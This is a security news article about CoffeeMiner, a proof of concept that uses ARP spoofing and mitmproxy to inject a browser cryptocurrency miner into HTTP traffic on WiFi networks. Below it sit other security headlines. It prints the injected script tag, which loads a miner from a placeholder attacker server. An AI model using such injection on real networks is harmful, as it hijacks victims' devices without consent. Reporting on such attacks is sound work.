Tuesday, December 5, 2023

CoffeeMiner – Hacking into WiFi Networks to Inject Cryptocurrency Miners

Cryptocurrency Miners are in the raise starting from last year, more than 500 million computers are mining cryptoCurrency in their browsers without the user’s knowledge.

A developer named Arnau published the CoffeeMiner script which intercepts the traffic between the users and the routers to inject scripts into HTML pages.

Arnau published a PoC explaining how a MITM attack performed (Man(Person)-In-The-Middle) to inject some javascript in the HTML pages, to force all the devices connected to a WiFi network to be mining a cryptocurrency for the attacker.

Attack Scenario – CoffeeMiner

CoffeeMiner employees ARPspoofing(used for resolving network layer address (IP) into link layer address (MAC)) for spoofing messages onto a local area network.

Also Read Xerosploit – Toolkit to Perform MITM, Spoofing, DOS, Images Sniffing/Replacement, WD Attacks

The mitmproxy used to analyze the traffic flow and to edit the traffic data. Here he injected a line of code into HTML pages that call the javascript cryptocurrency miner which is deployed in the in the attacker machine.

Injected Code

<script src=”http://httpserverIP:8000/script.js”></script>

Arnau used CoinHive javascript miner, “Coinhive offers a JavaScript miner for the Monero Blockchain that can be embedded into other Websites. The users run the miner directly in their Browser and mine XMR for the site owner in turn for an ad-free experience, in-game currency or whatever incentives they are availing to their users/visitors”.

He set up a Virtual box environment to demonstrate this and also published PoC video.

Now the CoffeeMiner works only with HTTP version and not with HTTPs, Arnau said he will be adding sslstrip to inject with HTTPS sites and autonomous Nmap scan, to add the IPs detected to the CoffeeMiner victim’s list.

The complete source code of CoffeeMiner published in GitHub.


Latest articles

Hackers Use Weaponized Documents to Attack U.S. Aerospace Industry

An American aerospace company has been the target of a commercial cyberespionage campaign dubbed...

Active Attacks Targeting Google Chrome & ownCloud Flaws: CISA Warns

The CISA announced two known exploited vulnerabilities active attacks targeting Google Chrome & own...

Cactus Ransomware Exploiting Qlik Sense code execution Vulnerability

A new Cactus Ransomware was exploited in the code execution vulnerability to Qlik Sense...

Hackers Bypass Antivirus with ScrubCrypt Tool to Install RedLine Malware

The ScrubCrypt obfuscation tool has been discovered to be utilized in attacks to disseminate the RedLine Stealer...

Hotel’s Booking.com Hacked Logins Let Attacker Steal Guest Credit Cards

According to a recent report by Secureworks, a well-planned and advanced phishing attack was...

Critical Zoom Vulnerability Let Attackers Take Over Meetings

Zoom, the most widely used video conferencing platform has been discovered with a critical...

Hackers Using Weaponized Invoice to Deliver LUMMA Malware

Hackers use weaponized invoices to exploit trust in financial transactions, embedding malware or malicious...

API Attack Simulation Webinar

Live API Attack Simulation

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked.The session will cover:an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway

Related Articles